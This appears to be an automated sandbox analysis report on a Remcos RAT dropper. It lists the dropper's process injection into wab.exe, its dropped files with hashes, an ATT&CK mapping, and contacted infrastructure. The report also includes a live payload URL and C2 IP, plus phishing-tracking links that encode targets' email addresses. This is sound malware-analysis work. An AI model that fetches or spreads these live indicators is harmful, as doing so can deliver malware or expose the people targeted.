Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: wab.exe, 00000007.00000002.2923725946.0000000006D88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWXM
Source: wab.exe, 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

API call chain: ExitProcess graph end node

graph_0-3462

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_04627801 LdrInitializeThunk,

1_2_04627801

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3E60000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 29CFAC8			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe

0_2_004036D7

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-UI3GST

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2923725946.0000000006DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 3844, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	111 Process Injection	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	1 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	111 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Q20240425 MAX5073626.com.exe	13%	ReversingLabs	Win32.Trojan.Generic
Q20240425 MAX5073626.com.exe	21%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe	13%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe	21%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://193.239.86.203/XWJPh99.binW	0%	Avira URL Cloud	safe
193.239.86.203	0%	Avira URL Cloud	safe
http://193.239.86.203/XWJPh99.bin	0%	Avira URL Cloud	safe
193.239.86.203	0%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
193.239.86.203	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://193.239.86.203/XWJPh99.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	false		high
http://193.239.86.203/XWJPh99.binW	wab.exe, 00000007.00000002.2923725946.0000000006DE1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware URL Reputation: malware	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2189367167.0000000005B37000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_Error...	Q20240425 MAX5073626.com.exe, Q20240425 MAX5073626.com.exe.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2186655798.0000000004AD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2186655798.0000000004C26000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.239.86.203	unknown	Romania		35215	MERITAPL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431846
Start date and time:	2024-04-25 21:35:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Q20240425 MAX5073626.com.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/11@0/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 91% Number of executed functions: 87 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6636 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
21:35:57	API Interceptor	44x Sleep call for process: powershell.exe modified
21:37:26	API Interceptor	132019x Sleep call for process: wab.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MERITAPL	tUqZNOmm4N.exe	Get hash	malicious	Unknown	Browse	193.239.84.207
	tUqZNOmm4N.exe	Get hash	malicious	Unknown	Browse	193.239.84.207
	https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?TFs7h=YW1jY2FpbkBoZW5zbGV5LmNvbQ==	Get hash	malicious	Unknown	Browse	193.239.86.148
	https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?WfAXv=c2dpbGxpc0BmdGd0ZWNobm9sb2dpZXMuY29t	Get hash	malicious	Unknown	Browse	193.239.86.148
	http://bofamg9tyg4b2o27vhp605cll44qj6.xyz	Get hash	malicious	Unknown	Browse	193.239.86.148
	https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?dJELV=cHJvY2hlQG1vb2cuY29t	Get hash	malicious	Unknown	Browse	193.239.86.148
	https://r20.rs6.net/tn.jsp?f=001TSlaXHeZHfjf7OZ5K8yup3PpRPnAI8u3-19KxQJ8L5nNh_d9YjpfjWGupQCBUnRrB3E9OGJwZ8EDD2imwuw20R20TVoilATwizXX9WPCYkxIsPJovI_F-65BL88LHP99D_uCeZrH3LnhuGY18V9s7bYi3YWrHVgvALikGguZ-dQ=&c=r_U7gJAN45HNKHClodPhxSlY4DkmbioISAi0CoXVlE4UXOHEGYKkcQ==&ch=TbxE6RuJ34_GSnvRMC7FbVsjB-Vyit1bo9N-cBXP4PiV2cw_s2Sfgw==&__=?aeTOH=cGF1bGEuY29ubmVyQGFwcmlhLmNvbQ==	Get hash	malicious	Unknown	Browse	193.239.86.148
	#Remit-INV34011.html	Get hash	malicious	HTMLPhisher	Browse	193.239.84.207
	https://protect-eu.mimecast.com/s/T6pRC8qvns8pVlhne8Fl?domain=pba.ph	Get hash	malicious	HTMLPhisher	Browse	193.239.84.207
	New Order PO- 19A20060 Quote for BPGIC-UAEProject-Items-Specifications.htm	Get hash	malicious	Unknown	Browse	193.239.84.207

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Edderduns.Ama

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 4.716187
Category:	dropped
Size (bytes):	305856
Entropy (8bit):	7.752758381192852
Encrypted:	false
SSDEEP:	6144:mvBTPxsNZQjgA3c5eELmmcH0KkaHdLOm14a8h34UzqehD06oXGV:WV7ehz40KzdLHyI1e5xn
MD5:	4433AA89BB2E3B2CD206C9F6EE4B88E2
SHA1:	889695DB99AA5CF9DEB29D599560C84FDEB6A56F
SHA-256:	980B91AE25A9F486F7C303C942DE6D6C25DA5E5B681156ECB59ECD52B024FEC7
SHA-512:	E81E20D296A5C53328DBD19902AB279601A2BA53D1ED9C004895B2BACF92FB5EC58FD0A644DA6BE814CBADDE9C90F4E29528DE79CB8926BC27C6EC54EBD33CF0
Malicious:	false
Reputation:	low
Preview:	......................?.........q....{...........P.......?..........1..............................~...............[[.......................................p..C......................{{{{.......w.'..............!..................**.........J.00........................?.......::::.............33.....AA.....c........l.............~...ll.888....EE.L.a....A...............=.m........................................y..LL...............>>.....s................FF.....................hh.7........s.22.......................L.........OOOO......mmmmmmm....7..............................W..I.RR.............O.v...........qqq................ss.....................................z......l.......m....................................>>.............................h....... .\....j.....ZZ.EEE...........................................yy..B..............Z............................FFFFFF......::.....;;;.................''''''....%%%%.....e...........%.0000....D.......................................".

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Interrelatedness\Opsparingsformelen\jezebelian.san

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	data
Category:	dropped
Size (bytes):	211532
Entropy (8bit):	1.0283457658459343
Encrypted:	false
SSDEEP:	768:HheYoYgU/XFwHKu/qVTJCxEgFafhhajvv9bxEsTcrDSqoiEScHk35Jnmhp8srwwC:Q6uiJnMSfe9XHS
MD5:	C981A5BAC46989F9C8511CB0DEBC2DBC
SHA1:	B01BE3D9E670623D138108991EA13753E73C74C1
SHA-256:	1A7C277FB80BF5743E3F3A8B43C83C2BA69A8D4D0FBFE133EC2E9E76D1DAB642
SHA-512:	F9D152F253E1A277515CB51B3D01E431B6FC53BF2314F91CC535AC5D23079BA937DB8E35B9E880810E5BC02AFB35C7072428DBFB72A37415DC51598DCE3ACCFB
Malicious:	false
Reputation:	low
Preview:	..............Z............o....................&.Y......<.................................................g....^..................................................................................N..............................@.......................D.....................................................................................z.................................................................................................A...............R..............2........$...................g........................................................R......................................V.............Q...V........................................h............7......?................................................................Y...........................................................................................................................w...............................[..........................=............................................:..................H.........d.......

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	794761
Entropy (8bit):	6.8128663964483165
Encrypted:	false
SSDEEP:	12288:K0Z4SNwhFaoncbHNsyBNzjdsO8aIaLJtBT7bbQ4:J4SO/wbtsQ9jdsFaxl3bbT
MD5:	1C089552C29F12843D8CD8E2BBF5CF5B
SHA1:	6F3E611FC7D7D5938B99575BCD96366D6E213EAB
SHA-256:	76DBFA281B158A18C83D08A907F087B7330DA28BDD2298EB9EE2F23C1DF40491
SHA-512:	3F6220CE4196EA9EC13EF699A8B8E51E8A7D5035511F8B252230BCC024E423610D5474587030F68DBFC5193BD02402975B6F71E9E352FD17453519748AB3A885
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 13% Antivirus: Virustotal, Detection: 21%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.#!{}Mr{}Mr{}Mr0.Isy}Mr0.Ksz}Mr0.Lst}Mr{}Lr.}Mr..Isp}Mr...rz}Mr..Osz}MrRich{}Mr........................PE..L...j.}d.................n...$.......6............@.......................................@.............................................X............................................................................................................text....l.......n.................. ..`.rdata..L............r..............@..@.data... ...........................@....ndata...p...............................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\Q20240425 MAX5073626.com.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Licente\neglectable.sin

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	data
Category:	dropped
Size (bytes):	99848
Entropy (8bit):	1.0220542563119581
Encrypted:	false
SSDEEP:	384:xoP85OaCXgL8vOiUii8TE2a+kjnoARGlZiPOSzM9gRTZ+yOTlRhQW4E1hGu6neF7:D5EeiHPcpRO59UEyOTVDUn+
MD5:	5A481E8570583297CD05B59C10C4D944
SHA1:	F695A764A65F552B400EE1DBA500FAE438C76F35
SHA-256:	C15D61C0F645CB800E4B38F0D9775FFE114BA9A01DD6CD14541E88C9A40C6F6F
SHA-512:	C2386D890C4E149C13308B0410F0C0BE1ADDA09C56C3C8E62E934F02FA017FA116F8E875767A345D38787E4AA5F385FDCFF2BF2B491C55613AF1A6D8C970697D
Malicious:	false
Reputation:	low
Preview:	........................i...E.........................................................!.................................................................................................................................................................%........{.....................%...................................................................................8............................w....."e.................................................T......................................................................................................\............................................................S..a......................L....+.............................................................................................................a.................G....................................."................................................]..................J........... ................................................."...............$.......................................

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\cirkelen.txt

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	ASCII text, with very long lines (318), with CRLF line terminators
Category:	dropped
Size (bytes):	462
Entropy (8bit):	4.276728693612834
Encrypted:	false
SSDEEP:	12:QA2YrdRblstTarSS87cMqOO0HRS3faTdcOHKNMn:VP5dearS71FRZctin
MD5:	803632F61D28D427E0DFE60D69BA4783
SHA1:	049FAC935D43A8EDFF81D3DCC476FB848602AB36
SHA-256:	848D0F365B637E26771C93E13546C50F7A09F56BFEDFAB9D632F926BD614C06B
SHA-512:	403F6FD16098ED296ABD1A42289AE3285BE53309D43F2B61F02CFB4F1CDE1D6DAA93248FF371485ABCB4FE986B8A3865D9920C69E0FD79D83B338547FD715EA9
Malicious:	false
Reputation:	low
Preview:	vrdireduktioner reduplicatively millennial undervisningstrinenes,applicableness efterlavet stablevognene testacea precorruptive smur,beaujolaisernes allocates subhypercube rvturen.brandkorpset hjpuldet majesttisk skrappe deratization martaban lorelei trokiske skrigenes tippedes bindehindes skrmarbejders atomreaktorer..forskningsprojektets feluccas fribords served studiekredsen afsmagen intermise..boblekammerets saluterendes carboxyhemoglobin anlet bigamists.

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\Piff\dugvaade.god

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	data
Category:	dropped
Size (bytes):	172798
Entropy (8bit):	1.0313470307928116
Encrypted:	false
SSDEEP:	768:C8az3L5eRFAJj22YTbw2D6rAAnxcbzwApYW+rb0sL5sflOpEAzMnV/4:We6C1V
MD5:	C5F9C46DAAA49AB38AE0302183F7B859
SHA1:	4B63F386DF42070B367582E9A11883F3531E560B
SHA-256:	C28B4EB84287DACFA2AD949D67909FB62B0FFF7427105AAE4AAE701037D9E5BF
SHA-512:	A609C8C1E4ADC36AB139786924363B9C3BC1A566613C311BCFAF05260B9F8DA4ABF0A1244C4E285B0147583701EDAD8A1572EC8571845AFC868984D127EF74CE
Malicious:	false
Preview:	..f........q..............................#.............................. ...........................................................................................j........................................a................................LDT................................................................................t.........W...........s...................................................................................................*..........................................................<.......................................o...........................?.................?..........................................................u....................................................D...............................................1.........................................+..H..................................s.....k..............%......................#..............................................................................................................................

C:\Users\user\AppData\Local\Radioactinium\bjergmassiverne\Haardest\dannelsestrinnet.Sta

Download File

Process:	C:\Users\user\Desktop\Q20240425 MAX5073626.com.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	84883
Entropy (8bit):	5.134488916230944
Encrypted:	false
SSDEEP:	1536:sJn8+IWbd2Gpiv/reaOJ9NsXYMc/QcZrnsHTvo8O7iFPniPsQUwuH2oQ:+pbsGpiv/yfwo1/VZLMs86i0kQUwuH2F
MD5:	C986903B6D507CF170E00CB73E2AFE97
SHA1:	4D54E166C2EC5E7844AE0C93C1E25DC3104AD9EF
SHA-256:	AAE5ED65A22D59635BD7451A31C91C91C7D3D9265DB88BB6DE3FABA46E1CCA30
SHA-512:	9C0DB6DE2FAE46D696EAB9F036FD45E732CD7B8912B68448C83F0DCF0D32A4A804B965C225A849251B7200FE865F06873E894E3B1570E980FBBC73E39D21ECA5
Malicious:	true
